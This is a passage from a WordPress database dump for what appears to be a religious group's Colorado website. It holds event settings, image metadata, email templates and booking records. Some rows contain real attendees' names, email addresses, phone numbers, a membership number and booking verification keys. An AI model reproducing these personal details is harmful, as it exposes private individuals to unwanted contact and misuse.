14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(190642,268947,'mec_fields','a:0:{}'),(190641,268947,'mec_op','a:0:{}'),(190640,268947,'mec_bfixed_fields','a:0:{}'),(190639,268947,'mec_reg_fields','a:0:{}'),(190638,268947,'mec_reg_fields_global_inheritance','1'),(190637,268947,'mec_ticket_variations','a:0:{}'),(190636,268947,'mec_ticket_variations_global_inheritance','1'),(190635,268947,'mec_fees','a:0:{}'),(190634,268947,'mec_fees_global_inheritance','1'),(190633,268947,'mec_tickets','a:0:{}'),(191756,269092,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1868;s:6:\"height\";i:463;s:4:\"file\";s:26:\"2023/09/web-promo-bk-6.jpg\";s:8:\"filesize\";i:269765;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"web-promo-bk-6-350x87.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:87;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11910;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"web-promo-bk-6-1024x254.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79859;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7327;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-768x190.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47720;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23853;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-500x463.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58120;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43173;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30538;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-6-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27658;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"web-promo-bk-6-1536x381.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160486;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191755,269092,'_wp_attached_file','2023/09/web-promo-bk-6.jpg'),(188962,268855,'_wp_attached_file','2023/07/spir-duties-ek-volunteer-5.jpg'),(188963,268855,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:924;s:6:\"height\";i:381;s:4:\"file\";s:38:\"2023/07/spir-duties-ek-volunteer-5.jpg\";s:8:\"filesize\";i:61285;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-350x144.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13890;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6187;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-768x317.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39567;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15489;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-500x381.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29959;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24335;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19107;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"spir-duties-ek-volunteer-5-300x381.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18695;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190632,268947,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190631,268947,'mec_hourly_schedules','a:0:{}'),(190630,268947,'mec_not_in_days',''),(190629,268947,'mec_in_days',''),(190628,268947,'mec_advanced_days','a:0:{}'),(190627,268947,'mec_repeat_end_at_date',''),(190626,268947,'mec_repeat_end_at_occurrences',''),(190625,268947,'mec_repeat_end',''),(190624,268947,'mec_repeat_interval','1'),(190623,268947,'mec_repeat_type',''),(190622,268947,'mec_repeat_status','0'),(190621,268947,'mec_end_day_seconds','41400'),(190620,268947,'mec_end_time_ampm','AM'),(190619,268947,'mec_end_time_minutes','30'),(190618,268947,'mec_end_time_hour','11'),(190617,268947,'mec_end_date','2023-09-10'),(190616,268947,'mec_start_day_seconds','37800'),(190602,268947,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190603,268947,'mec_certain_weekdays','a:0:{}'),(190604,268947,'mec_allday','0'),(190605,268947,'one_occurrence','0'),(190606,268947,'mec_hide_time','0'),(190607,268947,'mec_hide_end_time','0'),(190608,268947,'mec_comment',''),(190609,268947,'mec_timezone','global'),(190610,268947,'mec_countdown_method','global'),(190611,268947,'mec_public','1'),(190612,268947,'mec_start_date','2023-09-10'),(190613,268947,'mec_start_time_hour','10'),(190614,268947,'mec_start_time_minutes','30'),(190615,268947,'mec_start_time_ampm','AM'),(190601,268947,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190600,268947,'mec_additional_location_ids','a:0:{}'),(192423,269133,'_field_654','Anita'),(192424,269133,'_field_652','Krotz'),(190589,268947,'mec_color',''),(190590,268947,'mec_location_id','185'),(190591,268947,'mec_dont_show_map','0'),(190592,268947,'mec_organizer_id','1'),(190593,268947,'mec_read_more',''),(190594,268947,'mec_more_info',''),(190595,268947,'mec_more_info_title',''),(190596,268947,'mec_more_info_target','_self'),(190597,268947,'mec_cost',''),(190598,268947,'mec_currency','a:0:{}'),(190599,268947,'mec_additional_organizer_ids','a:0:{}'),(192425,269133,'_field_653','amktuza@joimail.com'),(192426,269133,'_field_651','(801) 674-5844'),(192404,269130,'_field_649','Hi,\nThis is from Roger Morandi. I hope I am signing up for the section with ARAHATA Candy Rushold.\nI want to continue studying with the same great group of people as my Satsang that just ended.\nSincerely,\nRoger'),(192405,269130,'_form_id','61'),(192380,269127,'_field_649','Looking forward to taking this class again after many years in ECK.\n\nLinda Bowman\nLone Tree, Colorado\nMember 2113035'),(190579,268946,'_seq_num','185'),(190578,268946,'_form_id','21'),(190577,268946,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(190576,268946,'_field_228','US'),(190575,268946,'_field_227','CO'),(190574,268946,'_field_226','lisa1lg3@gmail.com'),(190573,268946,'_field_225','Gage'),(190572,268946,'_field_224','Lisa'),(189046,268855,'original-file','2023/07/spir-duties-ek-volunteer-5-updraft-pre-smush-original.jpg'),(189047,268855,'smush-complete','1'),(189048,268855,'smush-info','The file was compressed from 59.85 KB to 54.98 KB saving 8.13 percent using WP-Optimize'),(189049,268855,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:61285;s:12:\"smushed-size\";i:56302;s:15:\"savings-percent\";d:8.1300000000000007815970093361102044582366943359375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:61285;s:10:\"compressed\";i:56302;}s:6:\"medium\";a:2:{s:8:\"original\";i:13890;s:10:\"compressed\";i:13642;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6187;s:10:\"compressed\";i:6121;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:39567;s:10:\"compressed\";i:38920;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:15489;s:10:\"compressed\";i:15438;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:29959;s:10:\"compressed\";i:29474;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:24335;s:10:\"compressed\";i:24022;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19107;s:10:\"compressed\";i:18876;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18695;s:10:\"compressed\";i:18495;}}}'),(189050,268857,'_wp_attached_file','2023/07/balance-4.jpg'),(189051,268857,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:802;s:6:\"height\";i:445;s:4:\"file\";s:21:\"2023/07/balance-4.jpg\";s:8:\"filesize\";i:114398;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"balance-4-350x194.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22950;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"balance-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9845;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"balance-4-768x426.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87419;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"balance-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33890;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:21:\"balance-4-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79508;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"balance-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49023;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"balance-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33980;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"balance-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42745;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189052,268859,'protect_children',''),(189053,268859,'mec_color',''),(189054,268859,'mec_location_id','118'),(189055,268859,'mec_dont_show_map','0'),(189056,268859,'mec_organizer_id','1'),(189057,268859,'mec_read_more',''),(189058,268859,'mec_more_info',''),(189059,268859,'mec_more_info_title',''),(189060,268859,'mec_more_info_target','_self'),(189061,268859,'mec_cost',''),(189062,268859,'mec_currency','a:0:{}'),(189063,268859,'mec_additional_organizer_ids','a:0:{}'),(189064,268859,'mec_additional_location_ids','a:0:{}'),(189065,268859,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189066,268859,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189067,268859,'mec_certain_weekdays','a:0:{}'),(189068,268859,'mec_allday','0'),(189069,268859,'one_occurrence','0'),(189070,268859,'mec_hide_time','0'),(189071,268859,'mec_hide_end_time','0'),(189072,268859,'mec_comment',''),(189073,268859,'mec_timezone','global'),(189074,268859,'mec_countdown_method','global'),(189075,268859,'mec_public','1'),(189076,268859,'mec_start_date','2023-08-31'),(189077,268859,'mec_start_time_hour','6'),(189078,268859,'mec_start_time_minutes','30'),(189079,268859,'mec_start_time_ampm','PM'),(189080,268859,'mec_start_day_seconds','66600'),(189081,268859,'mec_end_date','2023-08-31'),(189082,268859,'mec_end_time_hour','8'),(189083,268859,'mec_end_time_minutes','15'),(189084,268859,'mec_end_time_ampm','PM'),(189085,268859,'mec_end_day_seconds','72900'),(189086,268859,'mec_repeat_status','0'),(189087,268859,'mec_repeat_type',''),(189088,268859,'mec_repeat_interval','1'),(189089,268859,'mec_repeat_end',''),(189090,268859,'mec_repeat_end_at_occurrences',''),(189091,268859,'mec_repeat_end_at_date',''),(189092,268859,'mec_advanced_days','a:0:{}'),(189093,268859,'mec_in_days',''),(189094,268859,'mec_not_in_days',''),(189095,268859,'mec_hourly_schedules','a:0:{}'),(189096,268859,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189097,268859,'mec_tickets','a:0:{}'),(189098,268859,'mec_fees_global_inheritance','1'),(189099,268859,'mec_fees','a:0:{}'),(189100,268859,'mec_ticket_variations_global_inheritance','1'),(189101,268859,'mec_ticket_variations','a:0:{}'),(189102,268859,'mec_reg_fields_global_inheritance','1'),(189103,268859,'mec_reg_fields','a:0:{}'),(189104,268859,'mec_bfixed_fields','a:0:{}'),(189105,268859,'mec_op','a:0:{}'),(189106,268859,'mec_fields','a:0:{}'),(189107,268859,'mec_event_status','EventScheduled'),(189108,268859,'mec_moved_online_link',''),(189109,268859,'mec_cancelled_reason',''),(189110,268859,'mec_display_cancellation_reason_in_single_page',''),(189111,268859,'boldgrid_hide_page_title','0'),(189112,268859,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189113,268859,'passster_activate_global_protection',NULL),(189114,268859,'passster_activate_protection',NULL),(189115,268859,'passster_protection_type','password'),(189116,268859,'boldgrid_in_page_containers','1'),(189117,268859,'passster_area_shortcode',''),(189118,268859,'mec_cost_auto_calculate','0'),(189119,268859,'mec_style_per_event','global'),(189120,268859,'mec_trailer_url',''),(189121,268859,'mec_trailer_title',''),(189122,268859,'mec_start_datetime','2023-08-31 06:30 PM'),(189123,268859,'mec_end_datetime','2023-08-31 08:15 PM'),(189124,268859,'mec_sequence','13'),(189125,268859,'mec_event_gallery','a:0:{}'),(189126,268859,'mec_related_events','a:0:{}'),(189127,268859,'mec_banner','a:0:{}'),(189130,268859,'_dp_original','268848'),(189129,268859,'_thumbnail_id','268855'),(189131,268859,'_edit_lock','1693154910:2'),(189132,268859,'_edit_last','2'),(189133,268857,'original-file','2023/07/balance-4-updraft-pre-smush-original.jpg'),(189134,268857,'smush-complete','1'),(189135,268857,'smush-info','The file was compressed from 118.49 KB to 112.93 KB saving 4.69 percent using WP-Optimize'),(189136,268857,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:121333;s:12:\"smushed-size\";i:115637;s:15:\"savings-percent\";d:4.69000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:121333;s:10:\"compressed\";i:115637;}s:6:\"medium\";a:2:{s:8:\"original\";i:21805;s:10:\"compressed\";i:21307;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9652;s:10:\"compressed\";i:9586;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:93725;s:10:\"compressed\";i:91311;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:33188;s:10:\"compressed\";i:32160;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:82785;s:10:\"compressed\";i:79757;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47789;s:10:\"compressed\";i:46465;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33146;s:10:\"compressed\";i:32293;}s:8:\"tileview\";a:2:{s:8:\"original\";i:42678;s:10:\"compressed\";i:41423;}}}'),(193012,269149,'mec_event_status','EventScheduled'),(193013,269149,'mec_moved_online_link',''),(193014,269149,'mec_cancelled_reason',''),(193015,269149,'mec_display_cancellation_reason_in_single_page',''),(193016,269149,'protect_children',''),(193017,269149,'passster_activate_global_protection',NULL),(193018,269149,'passster_activate_protection',NULL),(193019,269149,'passster_protection_type','password'),(193020,269149,'boldgrid_hide_page_title','0'),(193021,269149,'_thumbnail_id','268845'),(193022,269149,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(193023,269149,'boldgrid_in_page_containers','1'),(193024,269149,'passster_area_shortcode',''),(193036,269149,'_dp_original','268425'),(193026,269149,'mec_cost_auto_calculate','0'),(193027,269149,'mec_style_per_event','global'),(193028,269149,'mec_trailer_url',''),(193029,269149,'mec_trailer_title',''),(193030,269149,'mec_start_datetime','2023-10-30 06:30 PM'),(193031,269149,'mec_end_datetime','2023-10-30 07:30 PM'),(193032,269149,'mec_sequence','13'),(193033,269149,'mec_event_gallery','a:0:{}'),(193034,269149,'mec_related_events','a:0:{}'),(193035,269149,'mec_banner','a:0:{}'),(193037,269149,'_edit_lock','1696279103:2'),(193038,269149,'_edit_last','2'),(193042,269148,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:184642;s:12:\"smushed-size\";i:167147;s:15:\"savings-percent\";d:9.480000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:184642;s:10:\"compressed\";i:167147;}s:6:\"medium\";a:2:{s:8:\"original\";i:22235;s:10:\"compressed\";i:20795;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9800;s:10:\"compressed\";i:9421;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:94278;s:10:\"compressed\";i:88906;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:34147;s:10:\"compressed\";i:31868;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:93594;s:10:\"compressed\";i:89142;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:56476;s:10:\"compressed\";i:52955;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:38435;s:10:\"compressed\";i:35966;}s:8:\"tileview\";a:2:{s:8:\"original\";i:43108;s:10:\"compressed\";i:40558;}}}'),(193048,269152,'_field_651','(240) 538-1211'),(193049,269152,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193050,269152,'_field_649','Dear Rolf,\n\nThank you so much for your service to the ECK.  I look forward to having you as my Arahata for the ECK Dream 2 Discourses.\n\nWith love and gratitude in ECK,\nNicki'),(193051,269152,'_form_id','61'),(193052,269152,'_seq_num','27'),(193053,269153,'_field_654','Lynne'),(193054,269153,'_field_652','Buckley'),(193055,269153,'_field_653','lynne.buckley@colorado.edu'),(193056,269153,'_field_651','(720) 496-6434'),(193057,269153,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(193058,269153,'_field_649',''),(189385,268857,'_edit_lock','1690994817:2'),(189386,268857,'passster_area_shortcode',''),(189393,268857,'folders_file_replaced','1690994735'),(189388,268857,'_edit_last','2'),(189389,268869,'original-file','2023/08/soul-travel-2-souls-4-updraft-pre-smush-original.jpg'),(189390,268869,'smush-info','The file was compressed from 89.93 KB to 75.69 KB saving 15.84 percent using WP-Optimize'),(189391,268869,'smush-complete','1'),(189392,268869,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:92089;s:12:\"smushed-size\";i:77506;s:15:\"savings-percent\";d:15.839999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:92089;s:10:\"compressed\";i:77506;}s:6:\"medium\";a:2:{s:8:\"original\";i:22229;s:10:\"compressed\";i:16425;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11763;s:10:\"compressed\";i:5955;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:22707;s:10:\"compressed\";i:16884;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:46512;s:10:\"compressed\";i:40481;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36898;s:10:\"compressed\";i:31190;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:28388;s:10:\"compressed\";i:22648;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24908;s:10:\"compressed\";i:19182;}}}'),(189306,268866,'mec_transaction_id','RGL40305'),(189307,268866,'mec_gateway','MEC_gateway_free'),(189308,268866,'mec_gateway_label','Free'),(189309,268866,'mec_user_id','1000021'),(189310,268866,'mec_verified','1'),(189311,268866,'mec_verification_key','2114b59a69dda7edf156304e1aa8684e'),(189312,268866,'mec_cancellation_key','d8f2f2d0fb64714a6fde705ad58893b3'),(189313,268866,'mec_confirmed','1'),(189314,268866,'mec_event_id','268863'),(189315,268866,'mec_date','1691922600:1691926200'),(189316,268866,'mec_ticket_id',',1,'),(189317,268866,'mec_booking_time','2023-08-02 